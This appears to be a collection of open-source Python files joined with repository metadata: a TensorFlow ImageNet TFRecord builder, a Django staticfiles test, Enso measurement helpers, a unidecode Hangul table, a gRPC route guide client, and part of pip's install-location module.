box annotations for the image.
num_shards: integer number of shards for this data set.
"""
# Each thread produces N shards where N = int(num_shards / num_threads).
# For instance, if num_shards = 128, and the num_threads = 2, then the first
# thread would produce shards [0, 64).
num_threads = len(ranges)
assert not num_shards % num_threads
num_shards_per_batch = int(num_shards / num_threads)
shard_ranges = np.linspace(ranges[thread_index][0],
ranges[thread_index][1],
num_shards_per_batch + 1).astype(int)
num_files_in_thread = ranges[thread_index][1] - ranges[thread_index][0]
counter = 0
for s in xrange(num_shards_per_batch):
# Generate a sharded version of the file name, e.g. 'train-00002-of-00010'
shard = thread_index * num_shards_per_batch + s
output_filename = '%s-%.5d-of-%.5d' % (name, shard, num_shards)
output_file = os.path.join(FLAGS.output_directory, output_filename)
writer = tf.python_io.TFRecordWriter(output_file)
shard_counter = 0
files_in_shard = np.arange(shard_ranges[s], shard_ranges[s + 1], dtype=int)
for i in files_in_shard:
filename = filenames[i]
label = labels[i]
synset = synsets[i]
human = humans[i]
bbox = bboxes[i]
image_buffer, height, width = _process_image(filename, coder)
example = _convert_to_example(filename, image_buffer, label,
synset, human, bbox,
height, width)
writer.write(example.SerializeToString())
shard_counter += 1
counter += 1
if not counter % 1000:
print('%s [thread %d]: Processed %d of %d images in thread batch.' %
(datetime.now(), thread_index, counter, num_files_in_thread))
sys.stdout.flush()
writer.close()
print('%s [thread %d]: Wrote %d images to %s' %
(datetime.now(), thread_index, shard_counter, output_file))
sys.stdout.flush()
shard_counter = 0
print('%s [thread %d]: Wrote %d images to %d shards.' %
(datetime.now(), thread_index, counter, num_files_in_thread))
sys.stdout.flush()
def _process_image_files(name, filenames, synsets, labels, humans,
bboxes, num_shards):
"""Process and save list of images as TFRecord of Example protos.
Args:
name: string, unique identifier specifying the data set
filenames: list of strings; each string is a path to an image file
synsets: list of strings; each string is a unique WordNet ID
labels: list of integer; each integer identifies the ground truth
humans: list of strings; each string is a human-readable label
bboxes: list of bounding boxes for each image. Note that each entry in this
list might contain from 0+ entries corresponding to the number of bounding
box annotations for the image.
num_shards: integer number of shards for this data set.
"""
assert len(filenames) == len(synsets)
assert len(filenames) == len(labels)
assert len(filenames) == len(humans)
assert len(filenames) == len(bboxes)
# Break all images into batches with a [ranges[i][0], ranges[i][1]].
spacing = np.linspace(0, len(filenames), FLAGS.num_threads + 1).astype(np.int)
ranges = []
threads = []
for i in xrange(len(spacing) - 1):
ranges.append([spacing[i], spacing[i+1]])
# Launch a thread for each batch.
print('Launching %d threads for spacings: %s' % (FLAGS.num_threads, ranges))
sys.stdout.flush()
# Create a mechanism for monitoring when all threads are finished.
coord = tf.train.Coordinator()
# Create a generic TensorFlow-based utility for converting all image codings.
coder = ImageCoder()
threads = []
for thread_index in xrange(len(ranges)):
args = (coder, thread_index, ranges, name, filenames,
synsets, labels, humans, bboxes, num_shards)
t = threading.Thread(target=_process_image_files_batch, args=args)
t.start()
threads.append(t)
# Wait for all the threads to terminate.
coord.join(threads)
print('%s: Finished writing all %d images in data set.' %
(datetime.now(), len(filenames)))
sys.stdout.flush()
def _find_image_files(data_dir, labels_file):
"""Build a list of all images files and labels in the data set.
Args:
data_dir: string, path to the root directory of images.
Assumes that the ImageNet data set resides in JPEG files located in
the following directory structure.
data_dir/n01440764/ILSVRC2012_val_00000293.JPEG
data_dir/n01440764/ILSVRC2012_val_00000543.JPEG
where 'n01440764' is the unique synset label associated with these images.
labels_file: string, path to the labels file.
The list of valid labels are held in this file. Assumes that the file
contains entries as such:
n01440764
n01443537
n01484850
where each line corresponds to a label expressed as a synset. We map
each synset contained in the file to an integer (based on the alphabetical
ordering) starting with the integer 1 corresponding to the synset
contained in the first line.
The reason we start the integer labels at 1 is to reserve label 0 as an
unused background class.
Returns:
filenames: list of strings; each string is a path to an image file.
synsets: list of strings; each string is a unique WordNet ID.
labels: list of integer; each integer identifies the ground truth.
"""
print('Determining list of input files and labels from %s.' % data_dir)
challenge_synsets = [l.strip() for l in
tf.gfile.FastGFile(labels_file, 'r').readlines()]
labels = []
filenames = []
synsets = []
# Leave label index 0 empty as a background class.
label_index = 1
# Construct the list of JPEG files and labels.
for synset in challenge_synsets:
jpeg_file_path = '%s/%s/*.JPEG' % (data_dir, synset)
matching_files = tf.gfile.Glob(jpeg_file_path)
labels.extend([label_index] * len(matching_files))
synsets.extend([synset] * len(matching_files))
filenames.extend(matching_files)
if not label_index % 100:
print('Finished finding files in %d of %d classes.' % (
label_index, len(challenge_synsets)))
label_index += 1
# Shuffle the ordering of all image files in order to guarantee
# random ordering of the images with respect to label in the
# saved TFRecord files. Make the randomization repeatable.
shuffled_index = range(len(filenames))
random.seed(12345)
random.shuffle(shuffled_index)
filenames = [filenames[i] for i in shuffled_index]
synsets = [synsets[i] for i in shuffled_index]
labels = [labels[i] for i in shuffled_index]
print('Found %d JPEG files across %d labels inside %s.' %
(len(filenames), len(challenge_synsets), data_dir))
return filenames, synsets, labels
def _find_human_readable_labels(synsets, synset_to_human):
"""Build a list of human-readable labels.
Args:
synsets: list of strings; each string is a unique WordNet ID.
synset_to_human: dict of synset to human labels, e.g.,
'n02119022' --> 'red fox, Vulpes vulpes'
Returns:
List of human-readable strings corresponding to each synset.
"""
humans = []
for s in synsets:
assert s in synset_to_human, ('Failed to find: %s' % s)
humans.append(synset_to_human[s])
return humans
def _find_image_bounding_boxes(filenames, image_to_bboxes):
"""Find the bounding boxes for a given image file.
Args:
filenames: list of strings; each string is a path to an image file.
image_to_bboxes: dictionary mapping image file names to a list of
bounding boxes. This list contains 0+ bounding boxes.
Returns:
List of bounding boxes for each image. Note that each entry in this
list might contain from 0+ entries corresponding to the number of bounding
box annotations for the image.
"""
num_image_bbox = 0
bboxes = []
for f in filenames:
basename = os.path.basename(f)
if basename in image_to_bboxes:
bboxes.append(image_to_bboxes[basename])
num_image_bbox += 1
else:
bboxes.append([])
print('Found %d images with bboxes out of %d images' % (
num_image_bbox, len(filenames)))
return bboxes
def _process_dataset(name, directory, num_shards, synset_to_human,
image_to_bboxes):
"""Process a complete data set and save it as a TFRecord.
Args:
name: string, unique identifier specifying the data set.
directory: string, root path to the data set.
num_shards: integer number of shards for this data set.
synset_to_human: dict of synset to human labels, e.g.,
'n02119022' --> 'red fox, Vulpes vulpes'
image_to_bboxes: dictionary mapping image file names to a list of
bounding boxes. This list contains 0+ bounding boxes.
"""
filenames, synsets, labels = _find_image_files(directory, FLAGS.labels_file)
humans = _find_human_readable_labels(synsets, synset_to_human)
bboxes = _find_image_bounding_boxes(filenames, image_to_bboxes)
_process_image_files(name, filenames, synsets, labels,
humans, bboxes, num_shards)
def _build_synset_lookup(imagenet_metadata_file):
"""Build lookup for synset to human-readable label.
Args:
imagenet_metadata_file: string, path to file containing mapping from
synset to human-readable label.
Assumes each line of the file looks like:
n02119247 black fox
n02119359 silver fox
n02119477 red fox, Vulpes fulva
where each line corresponds to a unique mapping. Note that each line is
formatted as <synset>\t<human readable label>.
Returns:
Dictionary of synset to human labels, such as:
'n02119022' --> 'red fox, Vulpes vulpes'
"""
lines = tf.gfile.FastGFile(imagenet_metadata_file, 'r').readlines()
synset_to_human = {}
for l in lines:
if l:
parts = l.strip().split('\t')
assert len(parts) == 2
synset = parts[0]
human = parts[1]
synset_to_human[synset] = human
return synset_to_human
def _build_bounding_box_lookup(bounding_box_file):
"""Build a lookup from image file to bounding boxes.
Args:
bounding_box_file: string, path to file with bounding boxes annotations.
Assumes each line of the file looks like:
n00007846_64193.JPEG,0.0060,0.2620,0.7545,0.9940
where each line corresponds to one bounding box annotation associated
with an image. Each line can be parsed as:
<JPEG file name>, <xmin>, <ymin>, <xmax>, <ymax>
Note that there might exist mulitple bounding box annotations associated
with an image file. This file is the output of process_bounding_boxes.py.
Returns:
Dictionary mapping image file names to a list of bounding boxes. This list
contains 0+ bounding boxes.
"""
lines = tf.gfile.FastGFile(bounding_box_file, 'r').readlines()
images_to_bboxes = {}
num_bbox = 0
num_image = 0
for l in lines:
if l:
parts = l.split(',')
assert len(parts) == 5, ('Failed to parse: %s' % l)
filename = parts[0]
xmin = float(parts[1])
ymin = float(parts[2])
xmax = float(parts[3])
ymax = float(parts[4])
box = [xmin, ymin, xmax, ymax]
if filename not in images_to_bboxes:
images_to_bboxes[filename] = []
num_image += 1
images_to_bboxes[filename].append(box)
num_bbox += 1
print('Successfully read %d bounding boxes '
'across %d images.' % (num_bbox, num_image))
return images_to_bboxes
def main(unused_argv):
assert not FLAGS.train_shards % FLAGS.num_threads, (
'Please make the FLAGS.num_threads commensurate with FLAGS.train_shards')
assert not FLAGS.validation_shards % FLAGS.num_threads, (
'Please make the FLAGS.num_threads commensurate with '
'FLAGS.validation_shards')
print('Saving results to %s' % FLAGS.output_directory)
# Build a map from synset to human-readable label.
synset_to_human = _build_synset_lookup(FLAGS.imagenet_metadata_file)
image_to_bboxes = _build_bounding_box_lookup(FLAGS.bounding_box_file)
# Run it!
_process_dataset('validation', FLAGS.validation_directory,
FLAGS.validation_shards, synset_to_human, image_to_bboxes)
_process_dataset('train', FLAGS.train_directory, FLAGS.train_shards,
synset_to_human, image_to_bboxes)
if __name__ == '__main__':
tf.app.run()
|
apache-2.0
|
SujaySKumar/django
|
tests/staticfiles_tests/test_liveserver.py
|
247
|
3474
|
"""
A subset of the tests in tests/servers/tests exercicing
django.contrib.staticfiles.testing.StaticLiveServerTestCase instead of
django.test.LiveServerTestCase.
"""
import contextlib
import os
from django.contrib.staticfiles.testing import StaticLiveServerTestCase
from django.core.exceptions import ImproperlyConfigured
from django.test import modify_settings, override_settings
from django.utils._os import upath
from django.utils.six.moves.urllib.request import urlopen
TEST_ROOT = os.path.dirname(upath(__file__))
TEST_SETTINGS = {
'MEDIA_URL': '/media/',
'STATIC_URL': '/static/',
'MEDIA_ROOT': os.path.join(TEST_ROOT, 'project', 'site_media', 'media'),
'STATIC_ROOT': os.path.join(TEST_ROOT, 'project', 'site_media', 'static'),
}
class LiveServerBase(StaticLiveServerTestCase):
available_apps = []
@classmethod
def setUpClass(cls):
# Override settings
cls.settings_override = override_settings(**TEST_SETTINGS)
cls.settings_override.enable()
super(LiveServerBase, cls).setUpClass()
@classmethod
def tearDownClass(cls):
# Restore original settings
cls.settings_override.disable()
super(LiveServerBase, cls).tearDownClass()
class StaticLiveServerChecks(LiveServerBase):
@classmethod
def setUpClass(cls):
# Backup original environment variable
address_predefined = 'DJANGO_LIVE_TEST_SERVER_ADDRESS' in os.environ
old_address = os.environ.get('DJANGO_LIVE_TEST_SERVER_ADDRESS')
# If contrib.staticfiles isn't configured properly, the exception
# should bubble up to the main thread.
old_STATIC_URL = TEST_SETTINGS['STATIC_URL']
TEST_SETTINGS['STATIC_URL'] = None
cls.raises_exception('localhost:8081', ImproperlyConfigured)
TEST_SETTINGS['STATIC_URL'] = old_STATIC_URL
# Restore original environment variable
if address_predefined:
os.environ['DJANGO_LIVE_TEST_SERVER_ADDRESS'] = old_address
else:
del os.environ['DJANGO_LIVE_TEST_SERVER_ADDRESS']
@classmethod
def tearDownClass(cls):
# skip it, as setUpClass doesn't call its parent either
pass
@classmethod
def raises_exception(cls, address, exception):
os.environ['DJANGO_LIVE_TEST_SERVER_ADDRESS'] = address
try:
super(StaticLiveServerChecks, cls).setUpClass()
raise Exception("The line above should have raised an exception")
except exception:
pass
finally:
super(StaticLiveServerChecks, cls).tearDownClass()
def test_test_test(self):
# Intentionally empty method so that the test is picked up by the
# test runner and the overridden setUpClass() method is executed.
pass
class StaticLiveServerView(LiveServerBase):
def urlopen(self, url):
return urlopen(self.live_server_url + url)
# The test is going to access a static file stored in this application.
@modify_settings(INSTALLED_APPS={'append': 'staticfiles_tests.apps.test'})
def test_collectstatic_emulation(self):
"""
Test that StaticLiveServerTestCase use of staticfiles' serve() allows it
to discover app's static assets without having to collectstatic first.
"""
with contextlib.closing(self.urlopen('/static/test/file.txt')) as f:
self.assertEqual(f.read().rstrip(b'\r\n'), b'In static directory.')
|
bsd-3-clause
|
ebbypeter/enso
|
enso/graphics/measurement.py
|
7
|
5398
|
# Copyright (c) 2008, Humanized, Inc.
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# 1. Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
#
# 2. Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
#
# 3. Neither the name of Enso nor the names of its contributors may
# be used to endorse or promote products derived from this
# software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY Humanized, Inc. ``AS IS'' AND ANY
# EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
# WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
# DISCLAIMED. IN NO EVENT SHALL Humanized, Inc. BE LIABLE FOR ANY
# DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
# (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND
# ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
# ----------------------------------------------------------------------------
#
# enso.graphics.measurement
#
# ----------------------------------------------------------------------------
"""
Screen measurement-related functionality.
This module handles coordinate conversion calculations and
maintains information on the pixel density of the screen.
"""
# ----------------------------------------------------------------------------
# Imports
# ----------------------------------------------------------------------------
from enso.utils.memoize import memoized
# ----------------------------------------------------------------------------
# Pixels-Per-Inch (PPI) Getter/Setter
# ----------------------------------------------------------------------------
DEFAULT_PPI = 96.0
_ppi = DEFAULT_PPI
def setPixelsPerInch( ppi ):
"""
Sets the current PPI of the screen in the Measurement module. This
alters the state of the module, in that any functions depending on
the PPI of the screen will use the value passed into this
function.
It is further assumed that the screen has square pixels (i.e., the
horizontal and vertical PPI of the screen are the same).
"""
global _ppi
_ppi = float(ppi)
def getPixelsPerInch():
"""
Returns the current PPI of the screen in the Measurement module.
"""
return _ppi
# ----------------------------------------------------------------------------
# Unit-of-Measurement Conversion Functions
# ----------------------------------------------------------------------------
def pointsToPixels( points ):
"""
Converts the given number of points to pixels, using the current
PPI settings.
"""
return points * getPixelsPerInch() / 72.0
def pixelsToPoints( pixels ):
"""
Converts the given number of pixels to points, using the current
PPI settings.
"""
return pixels * 72.0 / getPixelsPerInch()
def inchesToPoints( inches ):
"""
Converts the given number of inches to points.
"""
return inches * 72.0
def picasToPoints( picas ):
"""
Converts the given number of picas to points.
"""
return picas * 12.0
def calculateScreenPpi( screenDiagonal, hres, vres ):
"""
Given a screen's diagonal in inches, and the horizontal &
vertical resolution in pixels, calculates the pixels per inch of
the screen.
"""
import math
diagonalInPixels = math.sqrt( hres**2 + vres**2 )
return int( diagonalInPixels / screenDiagonal )
def convertUserSpaceToPoints( cairoContext ):
"""
Modifies the CTM of a Cairo Context so that all future drawing
operations on it can be specified in units of points rather than
pixels.
It is assumed that prior to this call, the Cairo Context's CTM is
the identity matrix.
"""
scaleFactor = getPixelsPerInch() / 72.0
cairoContext.scale( scaleFactor, scaleFactor )
@memoized
def strToPoints( unitsStr ):
"""
Converts from a string such as '2pt', '3in', '5pc', or '20px' into
a floating-point value measured in points.
Examples:
>>> setPixelsPerInch( 72 )
>>> strToPoints( '1in' )
72.0
>>> strToPoints( '1pt' )
1.0
>>> strToPoints( '5pc' )
60.0
>>> strToPoints( '72px' )
72.0
>>> strToPoints( '125em' )
Traceback (most recent call last):
...
ValueError: Bad measurement string: 125em
"""
units = float( unitsStr[:-2] )
if unitsStr.endswith( "pt" ):
return units
elif unitsStr.endswith( "in" ):
return inchesToPoints( units )
elif unitsStr.endswith( "pc" ):
return picasToPoints( units )
elif unitsStr.endswith( "px" ):
return pixelsToPoints( units )
else:
raise ValueError( "Bad measurement string: %s" % unitsStr )
|
bsd-3-clause
|
ActionAdam/osmc
|
package/mediacenter-skin-osmc/files/usr/share/kodi/addons/script.module.unidecode/lib/unidecode/x011.py
|
252
|
4135
|
data = (
'g', # 0x00
'gg', # 0x01
'n', # 0x02
'd', # 0x03
'dd', # 0x04
'r', # 0x05
'm', # 0x06
'b', # 0x07
'bb', # 0x08
's', # 0x09
'ss', # 0x0a
'', # 0x0b
'j', # 0x0c
'jj', # 0x0d
'c', # 0x0e
'k', # 0x0f
't', # 0x10
'p', # 0x11
'h', # 0x12
'ng', # 0x13
'nn', # 0x14
'nd', # 0x15
'nb', # 0x16
'dg', # 0x17
'rn', # 0x18
'rr', # 0x19
'rh', # 0x1a
'rN', # 0x1b
'mb', # 0x1c
'mN', # 0x1d
'bg', # 0x1e
'bn', # 0x1f
'', # 0x20
'bs', # 0x21
'bsg', # 0x22
'bst', # 0x23
'bsb', # 0x24
'bss', # 0x25
'bsj', # 0x26
'bj', # 0x27
'bc', # 0x28
'bt', # 0x29
'bp', # 0x2a
'bN', # 0x2b
'bbN', # 0x2c
'sg', # 0x2d
'sn', # 0x2e
'sd', # 0x2f
'sr', # 0x30
'sm', # 0x31
'sb', # 0x32
'sbg', # 0x33
'sss', # 0x34
's', # 0x35
'sj', # 0x36
'sc', # 0x37
'sk', # 0x38
'st', # 0x39
'sp', # 0x3a
'sh', # 0x3b
'', # 0x3c
'', # 0x3d
'', # 0x3e
'', # 0x3f
'Z', # 0x40
'g', # 0x41
'd', # 0x42
'm', # 0x43
'b', # 0x44
's', # 0x45
'Z', # 0x46
'', # 0x47
'j', # 0x48
'c', # 0x49
't', # 0x4a
'p', # 0x4b
'N', # 0x4c
'j', # 0x4d
'', # 0x4e
'', # 0x4f
'', # 0x50
'', # 0x51
'ck', # 0x52
'ch', # 0x53
'', # 0x54
'', # 0x55
'pb', # 0x56
'pN', # 0x57
'hh', # 0x58
'Q', # 0x59
'[?]', # 0x5a
'[?]', # 0x5b
'[?]', # 0x5c
'[?]', # 0x5d
'[?]', # 0x5e
'', # 0x5f
'', # 0x60
'a', # 0x61
'ae', # 0x62
'ya', # 0x63
'yae', # 0x64
'eo', # 0x65
'e', # 0x66
'yeo', # 0x67
'ye', # 0x68
'o', # 0x69
'wa', # 0x6a
'wae', # 0x6b
'oe', # 0x6c
'yo', # 0x6d
'u', # 0x6e
'weo', # 0x6f
'we', # 0x70
'wi', # 0x71
'yu', # 0x72
'eu', # 0x73
'yi', # 0x74
'i', # 0x75
'a-o', # 0x76
'a-u', # 0x77
'ya-o', # 0x78
'ya-yo', # 0x79
'eo-o', # 0x7a
'eo-u', # 0x7b
'eo-eu', # 0x7c
'yeo-o', # 0x7d
'yeo-u', # 0x7e
'o-eo', # 0x7f
'o-e', # 0x80
'o-ye', # 0x81
'o-o', # 0x82
'o-u', # 0x83
'yo-ya', # 0x84
'yo-yae', # 0x85
'yo-yeo', # 0x86
'yo-o', # 0x87
'yo-i', # 0x88
'u-a', # 0x89
'u-ae', # 0x8a
'u-eo-eu', # 0x8b
'u-ye', # 0x8c
'u-u', # 0x8d
'yu-a', # 0x8e
'yu-eo', # 0x8f
'yu-e', # 0x90
'yu-yeo', # 0x91
'yu-ye', # 0x92
'yu-u', # 0x93
'yu-i', # 0x94
'eu-u', # 0x95
'eu-eu', # 0x96
'yi-u', # 0x97
'i-a', # 0x98
'i-ya', # 0x99
'i-o', # 0x9a
'i-u', # 0x9b
'i-eu', # 0x9c
'i-U', # 0x9d
'U', # 0x9e
'U-eo', # 0x9f
'U-u', # 0xa0
'U-i', # 0xa1
'UU', # 0xa2
'[?]', # 0xa3
'[?]', # 0xa4
'[?]', # 0xa5
'[?]', # 0xa6
'[?]', # 0xa7
'g', # 0xa8
'gg', # 0xa9
'gs', # 0xaa
'n', # 0xab
'nj', # 0xac
'nh', # 0xad
'd', # 0xae
'l', # 0xaf
'lg', # 0xb0
'lm', # 0xb1
'lb', # 0xb2
'ls', # 0xb3
'lt', # 0xb4
'lp', # 0xb5
'lh', # 0xb6
'm', # 0xb7
'b', # 0xb8
'bs', # 0xb9
's', # 0xba
'ss', # 0xbb
'ng', # 0xbc
'j', # 0xbd
'c', # 0xbe
'k', # 0xbf
't', # 0xc0
'p', # 0xc1
'h', # 0xc2
'gl', # 0xc3
'gsg', # 0xc4
'ng', # 0xc5
'nd', # 0xc6
'ns', # 0xc7
'nZ', # 0xc8
'nt', # 0xc9
'dg', # 0xca
'tl', # 0xcb
'lgs', # 0xcc
'ln', # 0xcd
'ld', # 0xce
'lth', # 0xcf
'll', # 0xd0
'lmg', # 0xd1
'lms', # 0xd2
'lbs', # 0xd3
'lbh', # 0xd4
'rNp', # 0xd5
'lss', # 0xd6
'lZ', # 0xd7
'lk', # 0xd8
'lQ', # 0xd9
'mg', # 0xda
'ml', # 0xdb
'mb', # 0xdc
'ms', # 0xdd
'mss', # 0xde
'mZ', # 0xdf
'mc', # 0xe0
'mh', # 0xe1
'mN', # 0xe2
'bl', # 0xe3
'bp', # 0xe4
'ph', # 0xe5
'pN', # 0xe6
'sg', # 0xe7
'sd', # 0xe8
'sl', # 0xe9
'sb', # 0xea
'Z', # 0xeb
'g', # 0xec
'ss', # 0xed
'', # 0xee
'kh', # 0xef
'N', # 0xf0
'Ns', # 0xf1
'NZ', # 0xf2
'pb', # 0xf3
'pN', # 0xf4
'hn', # 0xf5
'hl', # 0xf6
'hm', # 0xf7
'hb', # 0xf8
'Q', # 0xf9
'[?]', # 0xfa
'[?]', # 0xfb
'[?]', # 0xfc
'[?]', # 0xfd
'[?]', # 0xfe
)
|
gpl-2.0
|
royalharsh/grpc
|
examples/python/route_guide/route_guide_client.py
|
25
|
4682
|
# Copyright 2015, Google Inc.
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following disclaimer
# in the documentation and/or other materials provided with the
# distribution.
# * Neither the name of Google Inc. nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
"""The Python implementation of the gRPC route guide client."""
from __future__ import print_function
import random
import time
import grpc
import route_guide_pb2
import route_guide_pb2_grpc
import route_guide_resources
def make_route_note(message, latitude, longitude):
return route_guide_pb2.RouteNote(
message=message,
location=route_guide_pb2.Point(latitude=latitude, longitude=longitude))
def guide_get_one_feature(stub, point):
feature = stub.GetFeature(point)
if not feature.location:
print("Server returned incomplete feature")
return
if feature.name:
print("Feature called %s at %s" % (feature.name, feature.location))
else:
print("Found no feature at %s" % feature.location)
def guide_get_feature(stub):
guide_get_one_feature(stub, route_guide_pb2.Point(latitude=409146138, longitude=-746188906))
guide_get_one_feature(stub, route_guide_pb2.Point(latitude=0, longitude=0))
def guide_list_features(stub):
rectangle = route_guide_pb2.Rectangle(
lo=route_guide_pb2.Point(latitude=400000000, longitude=-750000000),
hi=route_guide_pb2.Point(latitude=420000000, longitude=-730000000))
print("Looking for features between 40, -75 and 42, -73")
features = stub.ListFeatures(rectangle)
for feature in features:
print("Feature called %s at %s" % (feature.name, feature.location))
def generate_route(feature_list):
for _ in range(0, 10):
random_feature = feature_list[random.randint(0, len(feature_list) - 1)]
print("Visiting point %s" % random_feature.location)
yield random_feature.location
time.sleep(random.uniform(0.5, 1.5))
def guide_record_route(stub):
feature_list = route_guide_resources.read_route_guide_database()
route_iterator = generate_route(feature_list)
route_summary = stub.RecordRoute(route_iterator)
print("Finished trip with %s points " % route_summary.point_count)
print("Passed %s features " % route_summary.feature_count)
print("Travelled %s meters " % route_summary.distance)
print("It took %s seconds " % route_summary.elapsed_time)
def generate_messages():
messages = [
make_route_note("First message", 0, 0),
make_route_note("Second message", 0, 1),
make_route_note("Third message", 1, 0),
make_route_note("Fourth message", 0, 0),
make_route_note("Fifth message", 1, 0),
]
for msg in messages:
print("Sending %s at %s" % (msg.message, msg.location))
yield msg
time.sleep(random.uniform(0.5, 1.0))
def guide_route_chat(stub):
responses = stub.RouteChat(generate_messages())
for response in responses:
print("Received message %s at %s" % (response.message, response.location))
def run():
channel = grpc.insecure_channel('localhost:50051')
stub = route_guide_pb2_grpc.RouteGuideStub(channel)
print("-------------- GetFeature --------------")
guide_get_feature(stub)
print("-------------- ListFeatures --------------")
guide_list_features(stub)
print("-------------- RecordRoute --------------")
guide_record_route(stub)
print("-------------- RouteChat --------------")
guide_route_chat(stub)
if __name__ == '__main__':
run()
|
bsd-3-clause
|
classmember/proof_of_concept
|
python/events/lib/python3.4/site-packages/pip/_internal/locations.py
|
8
|
6307
|
"""Locations where we look for configs, install stuff, etc"""
from __future__ import absolute_import
import os
import os.path
import platform
import site
import sys
import sysconfig
from distutils import sysconfig as distutils_sysconfig
from distutils.command.install import SCHEME_KEYS # type: ignore
from pip._internal.utils import appdirs
from pip._internal.utils.compat import WINDOWS, expanduser
# Application Directories
USER_CACHE_DIR = appdirs.user_cache_dir("pip")
DELETE_MARKER_MESSAGE = '''\
This file is placed here by pip to indicate the source was put
here by pip.
Once this package is successfully installed this source code will be
deleted (unless you remove this file).
'''
PIP_DELETE_MARKER_FILENAME = 'pip-delete-this-directory.txt'
def write_delete_marker_file(directory):
"""
Write the pip delete marker file into this directory.
"""
filepath = os.path.join(directory, PIP_DELETE_MARKER_FILENAME)
with open(filepath, 'w') as marker_fp:
marker_fp.write(DELETE_MARKER_MESSAGE)
def running_under_virtualenv():
"""
Return True if we're running inside a virtualenv, False otherwise.
"""
if hasattr(sys, 'real_prefix'):
return True
elif sys.prefix != getattr(sys, "base_prefix", sys.prefix):
return True
return False
def virtualenv_no_global():
"""
Return True if in a venv and no system site packages.
"""
# this mirrors the logic in virtualenv.py for locating the
# no-global-site-packages.txt file
site_mod_dir = os.path.dirname(os.path.abspath(site.__file__))
no_global_file = os.path.join(site_mod_dir, 'no-global-site-packages.txt')
if running_under_virtualenv() and os.path.isfile(no_global_file):
return True
if running_under_virtualenv():
src_prefix = os.path.join(sys.prefix, 'src')
else:
# FIXME: keep src in cwd for now (it is not a temporary folder)
try:
src_prefix = os.path.join(os.getcwd(), 'src')
except OSError:
# In case the current working directory has been renamed or deleted
sys.exit(
"The folder you are executing pip from can no longer be found."
)
# under macOS + virtualenv sys.prefix is not properly resolved
# it is something like /path/to/python/bin/..
# Note: using realpath due to tmp dirs on OSX being symlinks
src_prefix = os.path.abspath(src_prefix)
# FIXME doesn't account for venv linked to global site-packages
site_packages = sysconfig.get_path("purelib")
# This is because of a bug in PyPy's sysconfig module, see
# https://bitbucket.org/pypy/pypy/issues/2506/sysconfig-returns-incorrect-paths
# for more information.
if platform.python_implementation().lower() == "pypy":
site_packages = distutils_sysconfig.get_python_lib()
try:
# Use getusersitepackages if this is present, as it ensures that the
# value is initialised properly.
user_site = site.getusersitepackages()
except AttributeError:
user_site = site.USER_SITE
user_dir = expanduser('~')
if WINDOWS:
bin_py = os.path.join(sys.prefix, 'Scripts')
bin_user = os.path.join(user_site, 'Scripts')
# buildout uses 'bin' on Windows too?
if not os.path.exists(bin_py):
bin_py = os.path.join(sys.prefix, 'bin')
bin_user = os.path.join(user_site, 'bin')
config_basename = 'pip.ini'
legacy_storage_dir = os.path.join(user_dir, 'pip')
legacy_config_file = os.path.join(
legacy_storage_dir,
config_basename,
)
else:
bin_py = os.path.join(sys.prefix, 'bin')
bin_user = os.path.join(user_site, 'bin')
config_basename = 'pip.conf'
legacy_storage_dir = os.path.join(user_dir, '.pip')
legacy_config_file = os.path.join(
legacy_storage_dir,
config_basename,
)
# Forcing to use /usr/local/bin for standard macOS framework installs
# Also log to ~/Library/Logs/ for use with the Console.app log viewer
if sys.platform[:6] == 'darwin' and sys.prefix[:16] == '/System/Library/':
bin_py = '/usr/local/bin'
site_config_files = [
os.path.join(path, config_basename)
for path in appdirs.site_config_dirs('pip')
]
venv_config_file = os.path.join(sys.prefix, config_basename)
new_config_file = os.path.join(appdirs.user_config_dir("pip"), config_basename)
def distutils_scheme(dist_name, user=False, home=None, root=None,
isolated=False, prefix=None):
"""
Return a distutils install scheme
"""
from distutils.dist import Distribution
scheme = {}
if isolated:
extra_dist_args = {"script_args": ["--no-user-cfg"]}
else:
extra_dist_args = {}
dist_args = {'name': dist_name}
dist_args.update(extra_dist_args)
d = Distribution(dist_args)
d.parse_config_files()
i = d.get_command_obj('install', create=True)
# NOTE: setting user or home has the side-effect of creating the home dir
# or user base for installations during finalize_options()
